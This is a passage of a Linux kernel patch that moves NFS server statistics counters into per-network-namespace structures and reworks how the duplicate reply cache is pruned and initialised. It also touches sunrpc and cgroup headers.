+-prune_cache_entries(struct nfsd_net *nn)
+-{
+-	unsigned int i;
+-	long freed = 0;
+ 
+-	for (i = 0; i < nn->drc_hashsize; i++) {
+-		struct nfsd_drc_bucket *b = &nn->drc_hashtbl[i];
++		nfsd_cacherep_unlink_locked(nn, b, rp);
++		list_add(&rp->c_lru, dispose);
+ 
+-		if (list_empty(&b->lru_head))
+-			continue;
+-		spin_lock(&b->cache_lock);
+-		freed += prune_bucket(b, nn, 0);
+-		spin_unlock(&b->cache_lock);
++		if (max && ++freed > max)
++			break;
+ 	}
+-	return freed;
+ }
+ 
++/**
++ * nfsd_reply_cache_count - count_objects method for the DRC shrinker
++ * @shrink: our registered shrinker context
++ * @sc: garbage collection parameters
++ *
++ * Returns the total number of entries in the duplicate reply cache. To
++ * keep things simple and quick, this is not the number of expired entries
++ * in the cache (ie, the number that would be removed by a call to
++ * nfsd_reply_cache_scan).
++ */
+ static unsigned long
+ nfsd_reply_cache_count(struct shrinker *shrink, struct shrink_control *sc)
+ {
+@@ -303,13 +308,43 @@ nfsd_reply_cache_count(struct shrinker *shrink, struct shrink_control *sc)
+ 	return atomic_read(&nn->num_drc_entries);
+ }
+ 
++/**
++ * nfsd_reply_cache_scan - scan_objects method for the DRC shrinker
++ * @shrink: our registered shrinker context
++ * @sc: garbage collection parameters
++ *
++ * Free expired entries on each bucket's LRU list until we've released
++ * nr_to_scan freed objects. Nothing will be released if the cache
++ * has not exceeded it's max_drc_entries limit.
++ *
++ * Returns the number of entries released by this call.
++ */
+ static unsigned long
+ nfsd_reply_cache_scan(struct shrinker *shrink, struct shrink_control *sc)
+ {
+ 	struct nfsd_net *nn = container_of(shrink,
+ 				struct nfsd_net, nfsd_reply_cache_shrinker);
++	unsigned long freed = 0;
++	LIST_HEAD(dispose);
++	unsigned int i;
++
++	for (i = 0; i < nn->drc_hashsize; i++) {
++		struct nfsd_drc_bucket *b = &nn->drc_hashtbl[i];
+ 
+-	return prune_cache_entries(nn);
++		if (list_empty(&b->lru_head))
++			continue;
++
++		spin_lock(&b->cache_lock);
++		nfsd_prune_bucket_locked(nn, b, 0, &dispose);
++		spin_unlock(&b->cache_lock);
++
++		freed += nfsd_cacherep_dispose(&dispose);
++		if (freed > sc->nr_to_scan)
++			break;
++	}
++
++	trace_nfsd_drc_gc(nn, freed);
++	return freed;
+ }
+ 
+ /**
+@@ -445,16 +480,18 @@ nfsd_cache_insert(struct nfsd_drc_bucket *b, struct svc_cacherep *key,
+ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 		      unsigned int len)
+ {
+-	struct nfsd_net		*nn;
++	struct nfsd_net		*nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 	struct svc_cacherep	*rp, *found;
+ 	__wsum			csum;
+ 	struct nfsd_drc_bucket	*b;
+ 	int type = rqstp->rq_cachetype;
++	unsigned long freed;
++	LIST_HEAD(dispose);
+ 	int rtn = RC_DOIT;
+ 
+ 	rqstp->rq_cacherep = NULL;
+ 	if (type == RC_NOCACHE) {
+-		nfsd_stats_rc_nocache_inc();
++		nfsd_stats_rc_nocache_inc(nn);
+ 		goto out;
+ 	}
+ 
+@@ -464,8 +501,7 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 	 * Since the common case is a cache miss followed by an insert,
+ 	 * preallocate an entry.
+ 	 */
+-	nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+-	rp = nfsd_reply_cache_alloc(rqstp, csum, nn);
++	rp = nfsd_cacherep_alloc(rqstp, csum, nn);
+ 	if (!rp)
+ 		goto out;
+ 
+@@ -474,25 +510,23 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 	found = nfsd_cache_insert(b, rp, nn);
+ 	if (found != rp)
+ 		goto found_entry;
+-
+-	nfsd_stats_rc_misses_inc();
+ 	rqstp->rq_cacherep = rp;
+ 	rp->c_state = RC_INPROG;
++	nfsd_prune_bucket_locked(nn, b, 3, &dispose);
++	spin_unlock(&b->cache_lock);
+ 
++	freed = nfsd_cacherep_dispose(&dispose);
++	trace_nfsd_drc_gc(nn, freed);
++
++	nfsd_stats_rc_misses_inc(nn);
+ 	atomic_inc(&nn->num_drc_entries);
+ 	nfsd_stats_drc_mem_usage_add(nn, sizeof(*rp));
+-
+-	nfsd_prune_bucket(b, nn);
+-
+-out_unlock:
+-	spin_unlock(&b->cache_lock);
+-out:
+-	return rtn;
++	goto out;
+ 
+ found_entry:
+ 	/* We found a matching entry which is either in progress or done. */
+ 	nfsd_reply_cache_free_locked(NULL, rp, nn);
+-	nfsd_stats_rc_hits_inc();
++	nfsd_stats_rc_hits_inc(nn);
+ 	rtn = RC_DROPIT;
+ 	rp = found;
+ 
+@@ -525,7 +559,10 @@ int nfsd_cache_lookup(struct svc_rqst *rqstp, unsigned int start,
+ 
+ out_trace:
+ 	trace_nfsd_drc_found(nn, rqstp, rtn);
+-	goto out_unlock;
++out_unlock:
++	spin_unlock(&b->cache_lock);
++out:
++	return rtn;
+ }
+ 
+ /**
+@@ -637,15 +674,15 @@ int nfsd_reply_cache_stats_show(struct seq_file *m, void *v)
+ 		   atomic_read(&nn->num_drc_entries));
+ 	seq_printf(m, "hash buckets:          %u\n", 1 << nn->maskbits);
+ 	seq_printf(m, "mem usage:             %lld\n",
+-		   percpu_counter_sum_positive(&nn->counter[NFSD_NET_DRC_MEM_USAGE]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_DRC_MEM_USAGE]));
+ 	seq_printf(m, "cache hits:            %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_HITS]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_HITS]));
+ 	seq_printf(m, "cache misses:          %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_MISSES]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_MISSES]));
+ 	seq_printf(m, "not cached:            %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_NOCACHE]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_NOCACHE]));
+ 	seq_printf(m, "payload misses:        %lld\n",
+-		   percpu_counter_sum_positive(&nn->counter[NFSD_NET_PAYLOAD_MISSES]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_PAYLOAD_MISSES]));
+ 	seq_printf(m, "longest chain len:     %u\n", nn->longest_chain);
+ 	seq_printf(m, "cachesize at longest:  %u\n", nn->longest_chain_cachesize);
+ 	return 0;
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 76a60e7a750978..813ae75e7128ea 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -1450,18 +1450,21 @@ static __net_init int nfsd_init_net(struct net *net)
+ 	retval = nfsd_idmap_init(net);
+ 	if (retval)
+ 		goto out_idmap_error;
++	retval = nfsd_stat_counters_init(nn);
++	if (retval)
++		goto out_repcache_error;
++	memset(&nn->nfsd_svcstats, 0, sizeof(nn->nfsd_svcstats));
++	nn->nfsd_svcstats.program = &nfsd_program;
+ 	nn->nfsd_versions = NULL;
+ 	nn->nfsd4_minorversions = NULL;
+ 	nfsd4_init_leases_net(nn);
+-	retval = nfsd_reply_cache_init(nn);
+-	if (retval)
+-		goto out_cache_error;
+ 	get_random_bytes(&nn->siphash_key, sizeof(nn->siphash_key));
+ 	seqlock_init(&nn->writeverf_lock);
++	nfsd_proc_stat_init(net);
+ 
+ 	return 0;
+ 
+-out_cache_error:
++out_repcache_error:
+ 	nfsd_idmap_shutdown(net);
+ out_idmap_error:
+ 	nfsd_export_shutdown(net);
+@@ -1473,10 +1476,11 @@ static __net_exit void nfsd_exit_net(struct net *net)
+ {
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+-	nfsd_reply_cache_shutdown(nn);
++	nfsd_proc_stat_shutdown(net);
++	nfsd_stat_counters_destroy(nn);
+ 	nfsd_idmap_shutdown(net);
+ 	nfsd_export_shutdown(net);
+-	nfsd_netns_free_versions(net_generic(net, nfsd_net_id));
++	nfsd_netns_free_versions(nn);
+ }
+ 
+ static struct pernet_operations nfsd_net_ops = {
+@@ -1496,12 +1500,9 @@ static int __init init_nfsd(void)
+ 	retval = nfsd4_init_pnfs();
+ 	if (retval)
+ 		goto out_free_slabs;
+-	retval = nfsd_stat_init();	/* Statistics */
+-	if (retval)
+-		goto out_free_pnfs;
+ 	retval = nfsd_drc_slab_create();
+ 	if (retval)
+-		goto out_free_stat;
++		goto out_free_pnfs;
+ 	nfsd_lockd_init();	/* lockd->nfsd callbacks */
+ 	retval = create_proc_exports_entry();
+ 	if (retval)
+@@ -1531,8 +1532,6 @@ static int __init init_nfsd(void)
+ out_free_lockd:
+ 	nfsd_lockd_shutdown();
+ 	nfsd_drc_slab_free();
+-out_free_stat:
+-	nfsd_stat_shutdown();
+ out_free_pnfs:
+ 	nfsd4_exit_pnfs();
+ out_free_slabs:
+@@ -1549,7 +1548,6 @@ static void __exit exit_nfsd(void)
+ 	nfsd_drc_slab_free();
+ 	remove_proc_entry("fs/nfs/exports", NULL);
+ 	remove_proc_entry("fs/nfs", NULL);
+-	nfsd_stat_shutdown();
+ 	nfsd_lockd_shutdown();
+ 	nfsd4_free_slabs();
+ 	nfsd4_exit_pnfs();
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index fa0144a742678f..0e557fb60a0e3c 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -69,6 +69,7 @@ extern struct mutex		nfsd_mutex;
+ extern spinlock_t		nfsd_drc_lock;
+ extern unsigned long		nfsd_drc_max_mem;
+ extern unsigned long		nfsd_drc_mem_used;
++extern atomic_t			nfsd_th_cnt;		/* number of available threads */
+ 
+ extern const struct seq_operations nfs_exports_op;
+ 
+diff --git a/fs/nfsd/nfsfh.c b/fs/nfsd/nfsfh.c
+index 3a2ad88ae6481e..e73e9d44f1b0ca 100644
+--- a/fs/nfsd/nfsfh.c
++++ b/fs/nfsd/nfsfh.c
+@@ -327,6 +327,7 @@ static __be32 nfsd_set_fh_dentry(struct svc_rqst *rqstp, struct svc_fh *fhp)
+ __be32
+ fh_verify(struct svc_rqst *rqstp, struct svc_fh *fhp, umode_t type, int access)
+ {
++	struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
+ 	struct svc_export *exp = NULL;
+ 	struct dentry	*dentry;
+ 	__be32		error;
+@@ -395,7 +396,7 @@ fh_verify(struct svc_rqst *rqstp, struct svc_fh *fhp, umode_t type, int access)
+ out:
+ 	trace_nfsd_fh_verify_err(rqstp, fhp, type, access, error);
+ 	if (error == nfserr_stale)
+-		nfsd_stats_fh_stale_inc(exp);
++		nfsd_stats_fh_stale_inc(nn, exp);
+ 	return error;
+ }
+ 
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index a8190caf77f172..9eb529969b224a 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -34,6 +34,7 @@
+ 
+ #define NFSDDBG_FACILITY	NFSDDBG_SVC
+ 
++atomic_t			nfsd_th_cnt = ATOMIC_INIT(0);
+ extern struct svc_program	nfsd_program;
+ static int			nfsd(void *vrqstp);
+ #if defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL)
+@@ -89,7 +90,6 @@ unsigned long	nfsd_drc_max_mem;
+ unsigned long	nfsd_drc_mem_used;
+ 
+ #if defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL)
+-static struct svc_stat	nfsd_acl_svcstats;
+ static const struct svc_version *nfsd_acl_version[] = {
+ # if defined(CONFIG_NFSD_V2_ACL)
+ 	[2] = &nfsd_acl_version2,
+@@ -108,15 +108,11 @@ static struct svc_program	nfsd_acl_program = {
+ 	.pg_vers		= nfsd_acl_version,
+ 	.pg_name		= "nfsacl",
+ 	.pg_class		= "nfsd",
+-	.pg_stats		= &nfsd_acl_svcstats,
+ 	.pg_authenticate	= &svc_set_client,
+ 	.pg_init_request	= nfsd_acl_init_request,
+ 	.pg_rpcbind_set		= nfsd_acl_rpcbind_set,
+ };
+ 
+-static struct svc_stat	nfsd_acl_svcstats = {
+-	.program	= &nfsd_acl_program,
+-};
+ #endif /* defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL) */
+ 
+ static const struct svc_version *nfsd_version[] = {
+@@ -141,7 +137,6 @@ struct svc_program		nfsd_program = {
+ 	.pg_vers		= nfsd_version,		/* version table */
+ 	.pg_name		= "nfsd",		/* program name */
+ 	.pg_class		= "nfsd",		/* authentication class */
+-	.pg_stats		= &nfsd_svcstats,	/* version table */
+ 	.pg_authenticate	= &svc_set_client,	/* export authentication */
+ 	.pg_init_request	= nfsd_init_request,
+ 	.pg_rpcbind_set		= nfsd_rpcbind_set,
+@@ -427,16 +422,23 @@ static int nfsd_startup_net(struct net *net, const struct cred *cred)
+ 	ret = nfsd_file_cache_start_net(net);
+ 	if (ret)
+ 		goto out_lockd;
+-	ret = nfs4_state_start_net(net);
++
++	ret = nfsd_reply_cache_init(nn);
+ 	if (ret)
+ 		goto out_filecache;
+ 
++	ret = nfs4_state_start_net(net);
++	if (ret)
++		goto out_reply_cache;
++
+ #ifdef CONFIG_NFSD_V4_2_INTER_SSC
+ 	nfsd4_ssc_init_umount_work(nn);
+ #endif
+ 	nn->nfsd_net_up = true;
+ 	return 0;
+ 
++out_reply_cache:
++	nfsd_reply_cache_shutdown(nn);
+ out_filecache:
+ 	nfsd_file_cache_shutdown_net(net);
+ out_lockd:
+@@ -454,6 +456,7 @@ static void nfsd_shutdown_net(struct net *net)
+ 	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+ 	nfs4_state_shutdown_net(net);
++	nfsd_reply_cache_shutdown(nn);
+ 	nfsd_file_cache_shutdown_net(net);
+ 	if (nn->lockd_up) {
+ 		lockd_down(net);
+@@ -654,7 +657,8 @@ int nfsd_create_serv(struct net *net)
+ 	if (nfsd_max_blksize == 0)
+ 		nfsd_max_blksize = nfsd_get_default_max_blksize();
+ 	nfsd_reset_versions(nn);
+-	serv = svc_create_pooled(&nfsd_program, nfsd_max_blksize, nfsd);
++	serv = svc_create_pooled(&nfsd_program, &nn->nfsd_svcstats,
++				 nfsd_max_blksize, nfsd);
+ 	if (serv == NULL)
+ 		return -ENOMEM;
+ 
+@@ -952,7 +956,7 @@ nfsd(void *vrqstp)
+ 
+ 	current->fs->umask = 0;
+ 
+-	atomic_inc(&nfsdstats.th_cnt);
++	atomic_inc(&nfsd_th_cnt);
+ 
+ 	set_freezable();
+ 
+@@ -976,7 +980,7 @@ nfsd(void *vrqstp)
+ 		validate_process_creds();
+ 	}
+ 
+-	atomic_dec(&nfsdstats.th_cnt);
++	atomic_dec(&nfsd_th_cnt);
+ 
+ out:
+ 	/* Take an extra ref so that the svc_put in svc_exit_thread()
+diff --git a/fs/nfsd/stats.c b/fs/nfsd/stats.c
+index 777e24e5da33bd..36f1373bbe3f05 100644
+--- a/fs/nfsd/stats.c
++++ b/fs/nfsd/stats.c
+@@ -27,25 +27,22 @@
+ 
+ #include "nfsd.h"
+ 
+-struct nfsd_stats	nfsdstats;
+-struct svc_stat		nfsd_svcstats = {
+-	.program	= &nfsd_program,
+-};
+-
+ static int nfsd_show(struct seq_file *seq, void *v)
+ {
++	struct net *net = pde_data(file_inode(seq->file));
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 	int i;
+ 
+ 	seq_printf(seq, "rc %lld %lld %lld\nfh %lld 0 0 0 0\nio %lld %lld\n",
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_HITS]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_MISSES]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_RC_NOCACHE]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_FH_STALE]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_IO_READ]),
+-		   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_IO_WRITE]));
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_HITS]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_MISSES]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_RC_NOCACHE]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_FH_STALE]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_IO_READ]),
++		   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_IO_WRITE]));
+ 
+ 	/* thread usage: */
+-	seq_printf(seq, "th %u 0", atomic_read(&nfsdstats.th_cnt));
++	seq_printf(seq, "th %u 0", atomic_read(&nfsd_th_cnt));
+ 
+ 	/* deprecated thread usage histogram stats */
+ 	for (i = 0; i < 10; i++)
+@@ -55,7 +52,7 @@ static int nfsd_show(struct seq_file *seq, void *v)
+ 	seq_puts(seq, "\nra 0 0 0 0 0 0 0 0 0 0 0 0\n");
+ 
+ 	/* show my rpc info */
+-	svc_seq_show(seq, &nfsd_svcstats);
++	svc_seq_show(seq, &nn->nfsd_svcstats);
+ 
+ #ifdef CONFIG_NFSD_V4
+ 	/* Show count for individual nfsv4 operations */
+@@ -63,7 +60,7 @@ static int nfsd_show(struct seq_file *seq, void *v)
+ 	seq_printf(seq,"proc4ops %u", LAST_NFS4_OP + 1);
+ 	for (i = 0; i <= LAST_NFS4_OP; i++) {
+ 		seq_printf(seq, " %lld",
+-			   percpu_counter_sum_positive(&nfsdstats.counter[NFSD_STATS_NFS4_OP(i)]));
++			   percpu_counter_sum_positive(&nn->counter[NFSD_STATS_NFS4_OP(i)]));
+ 	}
+ 
+ 	seq_putc(seq, '\n');
+@@ -74,7 +71,7 @@ static int nfsd_show(struct seq_file *seq, void *v)
+ 
+ DEFINE_PROC_SHOW_ATTRIBUTE(nfsd);
+ 
+-int nfsd_percpu_counters_init(struct percpu_counter counters[], int num)
++int nfsd_percpu_counters_init(struct percpu_counter *counters, int num)
+ {
+ 	int i, err = 0;
+ 
+@@ -106,31 +103,24 @@ void nfsd_percpu_counters_destroy(struct percpu_counter counters[], int num)
+ 		percpu_counter_destroy(&counters[i]);
+ }
+ 
+-static int nfsd_stat_counters_init(void)
++int nfsd_stat_counters_init(struct nfsd_net *nn)
+ {
+-	return nfsd_percpu_counters_init(nfsdstats.counter, NFSD_STATS_COUNTERS_NUM);
++	return nfsd_percpu_counters_init(nn->counter, NFSD_STATS_COUNTERS_NUM);
+ }
+ 
+-static void nfsd_stat_counters_destroy(void)
++void nfsd_stat_counters_destroy(struct nfsd_net *nn)
+ {
+-	nfsd_percpu_counters_destroy(nfsdstats.counter, NFSD_STATS_COUNTERS_NUM);
++	nfsd_percpu_counters_destroy(nn->counter, NFSD_STATS_COUNTERS_NUM);
+ }
+ 
+-int nfsd_stat_init(void)
++void nfsd_proc_stat_init(struct net *net)
+ {
+-	int err;
+-
+-	err = nfsd_stat_counters_init();
+-	if (err)
+-		return err;
++	struct nfsd_net *nn = net_generic(net, nfsd_net_id);
+ 
+-	svc_proc_register(&init_net, &nfsd_svcstats, &nfsd_proc_ops);
+-
+-	return 0;
++	svc_proc_register(net, &nn->nfsd_svcstats, &nfsd_proc_ops);
+ }
+ 
+-void nfsd_stat_shutdown(void)
++void nfsd_proc_stat_shutdown(struct net *net)
+ {
+-	nfsd_stat_counters_destroy();
+-	svc_proc_unregister(&init_net, "nfsd");
++	svc_proc_unregister(net, "nfsd");
+ }
+diff --git a/fs/nfsd/stats.h b/fs/nfsd/stats.h
+index 9b43dc3d999139..14525e854cbac3 100644
+--- a/fs/nfsd/stats.h
++++ b/fs/nfsd/stats.h
+@@ -10,87 +10,66 @@
+ #include <uapi/linux/nfsd/stats.h>
+ #include <linux/percpu_counter.h>
+ 
+-
+-enum {
+-	NFSD_STATS_RC_HITS,		/* repcache hits */
+-	NFSD_STATS_RC_MISSES,		/* repcache misses */
+-	NFSD_STATS_RC_NOCACHE,		/* uncached reqs */
+-	NFSD_STATS_FH_STALE,		/* FH stale error */
+-	NFSD_STATS_IO_READ,		/* bytes returned to read requests */
+-	NFSD_STATS_IO_WRITE,		/* bytes passed in write requests */
+-#ifdef CONFIG_NFSD_V4
+-	NFSD_STATS_FIRST_NFS4_OP,	/* count of individual nfsv4 operations */
+-	NFSD_STATS_LAST_NFS4_OP = NFSD_STATS_FIRST_NFS4_OP + LAST_NFS4_OP,
+-#define NFSD_STATS_NFS4_OP(op)	(NFSD_STATS_FIRST_NFS4_OP + (op))
+-#endif
+-	NFSD_STATS_COUNTERS_NUM
+-};
+-
+-struct nfsd_stats {
+-	struct percpu_counter	counter[NFSD_STATS_COUNTERS_NUM];
+-
+-	atomic_t	th_cnt;		/* number of available threads */
+-};
+-
+-extern struct nfsd_stats	nfsdstats;
+-
+-extern struct svc_stat		nfsd_svcstats;
+-
+-int nfsd_percpu_counters_init(struct percpu_counter counters[], int num);
+-void nfsd_percpu_counters_reset(struct percpu_counter counters[], int num);
+-void nfsd_percpu_counters_destroy(struct percpu_counter counters[], int num);
+-int nfsd_stat_init(void);
+-void nfsd_stat_shutdown(void);
+-
+-static inline void nfsd_stats_rc_hits_inc(void)
++int nfsd_percpu_counters_init(struct percpu_counter *counters, int num);
++void nfsd_percpu_counters_reset(struct percpu_counter *counters, int num);
++void nfsd_percpu_counters_destroy(struct percpu_counter *counters, int num);
++int nfsd_stat_counters_init(struct nfsd_net *nn);
++void nfsd_stat_counters_destroy(struct nfsd_net *nn);
++void nfsd_proc_stat_init(struct net *net);
++void nfsd_proc_stat_shutdown(struct net *net);
++
++static inline void nfsd_stats_rc_hits_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_RC_HITS]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_RC_HITS]);
+ }
+ 
+-static inline void nfsd_stats_rc_misses_inc(void)
++static inline void nfsd_stats_rc_misses_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_RC_MISSES]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_RC_MISSES]);
+ }
+ 
+-static inline void nfsd_stats_rc_nocache_inc(void)
++static inline void nfsd_stats_rc_nocache_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_RC_NOCACHE]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_RC_NOCACHE]);
+ }
+ 
+-static inline void nfsd_stats_fh_stale_inc(struct svc_export *exp)
++static inline void nfsd_stats_fh_stale_inc(struct nfsd_net *nn,
++					   struct svc_export *exp)
+ {
+-	percpu_counter_inc(&nfsdstats.counter[NFSD_STATS_FH_STALE]);
+-	if (exp)
+-		percpu_counter_inc(&exp->ex_stats.counter[EXP_STATS_FH_STALE]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_FH_STALE]);
++	if (exp && exp->ex_stats)
++		percpu_counter_inc(&exp->ex_stats->counter[EXP_STATS_FH_STALE]);
+ }
+ 
+-static inline void nfsd_stats_io_read_add(struct svc_export *exp, s64 amount)
++static inline void nfsd_stats_io_read_add(struct nfsd_net *nn,
++					  struct svc_export *exp, s64 amount)
+ {
+-	percpu_counter_add(&nfsdstats.counter[NFSD_STATS_IO_READ], amount);
+-	if (exp)
+-		percpu_counter_add(&exp->ex_stats.counter[EXP_STATS_IO_READ], amount);
++	percpu_counter_add(&nn->counter[NFSD_STATS_IO_READ], amount);
++	if (exp && exp->ex_stats)
++		percpu_counter_add(&exp->ex_stats->counter[EXP_STATS_IO_READ], amount);
+ }
+ 
+-static inline void nfsd_stats_io_write_add(struct svc_export *exp, s64 amount)
++static inline void nfsd_stats_io_write_add(struct nfsd_net *nn,
++					   struct svc_export *exp, s64 amount)
+ {
+-	percpu_counter_add(&nfsdstats.counter[NFSD_STATS_IO_WRITE], amount);
+-	if (exp)
+-		percpu_counter_add(&exp->ex_stats.counter[EXP_STATS_IO_WRITE], amount);
++	percpu_counter_add(&nn->counter[NFSD_STATS_IO_WRITE], amount);
++	if (exp && exp->ex_stats)
++		percpu_counter_add(&exp->ex_stats->counter[EXP_STATS_IO_WRITE], amount);
+ }
+ 
+ static inline void nfsd_stats_payload_misses_inc(struct nfsd_net *nn)
+ {
+-	percpu_counter_inc(&nn->counter[NFSD_NET_PAYLOAD_MISSES]);
++	percpu_counter_inc(&nn->counter[NFSD_STATS_PAYLOAD_MISSES]);
+ }
+ 
+ static inline void nfsd_stats_drc_mem_usage_add(struct nfsd_net *nn, s64 amount)
+ {
+-	percpu_counter_add(&nn->counter[NFSD_NET_DRC_MEM_USAGE], amount);
++	percpu_counter_add(&nn->counter[NFSD_STATS_DRC_MEM_USAGE], amount);
+ }
+ 
+ static inline void nfsd_stats_drc_mem_usage_sub(struct nfsd_net *nn, s64 amount)
+ {
+-	percpu_counter_sub(&nn->counter[NFSD_NET_DRC_MEM_USAGE], amount);
++	percpu_counter_sub(&nn->counter[NFSD_STATS_DRC_MEM_USAGE], amount);
+ }
+ 
+ #endif /* _NFSD_STATS_H */
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 84f26f281fe9f2..447b3483f94ba3 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -1261,6 +1261,28 @@ TRACE_EVENT(nfsd_drc_mismatch,
+ 		__entry->ingress)
+ );
+ 
++TRACE_EVENT_CONDITION(nfsd_drc_gc,
++	TP_PROTO(
++		const struct nfsd_net *nn,
++		unsigned long freed
++	),
++	TP_ARGS(nn, freed),
++	TP_CONDITION(freed > 0),
++	TP_STRUCT__entry(
++		__field(unsigned long long, boot_time)
++		__field(unsigned long, freed)
++		__field(int, total)
++	),
++	TP_fast_assign(
++		__entry->boot_time = nn->boot_time;
++		__entry->freed = freed;
++		__entry->total = atomic_read(&nn->num_drc_entries);
++	),
++	TP_printk("boot_time=%16llx total=%d freed=%lu",
++		__entry->boot_time, __entry->total, __entry->freed
++	)
++);
++
+ TRACE_EVENT(nfsd_cb_args,
+ 	TP_PROTO(
+ 		const struct nfs4_client *clp,
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 5d6a61d47a9059..17e96e58e77279 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -983,7 +983,9 @@ static __be32 nfsd_finish_read(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 			       unsigned long *count, u32 *eof, ssize_t host_err)
+ {
+ 	if (host_err >= 0) {
+-		nfsd_stats_io_read_add(fhp->fh_export, host_err);
++		struct nfsd_net *nn = net_generic(SVC_NET(rqstp), nfsd_net_id);
++
++		nfsd_stats_io_read_add(nn, fhp->fh_export, host_err);
+ 		*eof = nfsd_eof_on_read(file, offset, host_err, *count);
+ 		*count = host_err;
+ 		fsnotify_access(file);
+@@ -1126,7 +1128,7 @@ nfsd_vfs_write(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
+ 		goto out_nfserr;
+ 	}
+ 	*cnt = host_err;
+-	nfsd_stats_io_write_add(exp, *cnt);
++	nfsd_stats_io_write_add(nn, exp, *cnt);
+ 	fsnotify_modify(file);
+ 	host_err = filemap_check_wb_err(file->f_mapping, since);
+ 	if (host_err < 0)
+diff --git a/include/linux/cgroup-defs.h b/include/linux/cgroup-defs.h
+index 6e01f10f0d8899..be8980b023550e 100644
+--- a/include/linux/cgroup-defs.h
++++ b/include/linux/cgroup-defs.h
+@@ -525,6 +525,10 @@ struct cgroup_root {
+ 	/* Unique id for this hierarchy. */
+ 	int hierarchy_id;
+ 
++	/* A list running through the active hierarchies */
++	struct list_head root_list;
++	struct rcu_head rcu;	/* Must be near the top */
++
+ 	/*
+ 	 * The root cgroup. The containing cgroup_root will be destroyed on its
+ 	 * release. cgrp->ancestors[0] will be used overflowing into the
+@@ -538,9 +542,6 @@ struct cgroup_root {
+ 	/* Number of cgroups in the hierarchy, used only for /proc/cgroups */
+ 	atomic_t nr_cgrps;
+ 
+-	/* A list running through the active hierarchies */
+-	struct list_head root_list;
+-
+ 	/* Hierarchy-specific flags */
+ 	unsigned int flags;
+ 
+diff --git a/include/linux/sunrpc/svc.h b/include/linux/sunrpc/svc.h
+index 88de45491376a6..912da376ef9bf1 100644
+--- a/include/linux/sunrpc/svc.h
++++ b/include/linux/sunrpc/svc.h
+@@ -422,7 +422,6 @@ struct svc_program {
+ 	const struct svc_version **pg_vers;	/* version array */
+ 	char *			pg_name;	/* service name */
+ 	char *			pg_class;	/* class name: services sharing authentication */
+-	struct svc_stat *	pg_stats;	/* rpc statistics */
+ 	int			(*pg_authenticate)(struct svc_rqst *);
+ 	__be32			(*pg_init_request)(struct svc_rqst *,
+ 						   const struct svc_program *,
+@@ -493,7 +492,9 @@ void		   svc_rqst_replace_page(struct svc_rqst *rqstp,
+ 					 struct page *page);
+ void		   svc_rqst_free(struct svc_rqst *);
+ void		   svc_exit_thread(struct svc_rqst *);
+-struct svc_serv *  svc_create_pooled(struct svc_program *, unsigned int,
++struct svc_serv *  svc_create_pooled(struct svc_program *prog,
++				     struct svc_stat *stats,
++				     unsigned int bufsize,
+ 				     int (*threadfn)(void *data));
+ int		   svc_set_num_threads(struct svc_serv *, struct svc_pool *, int);
+ int		   svc_pool_stats_open(struct svc_serv *serv, struct file *file);
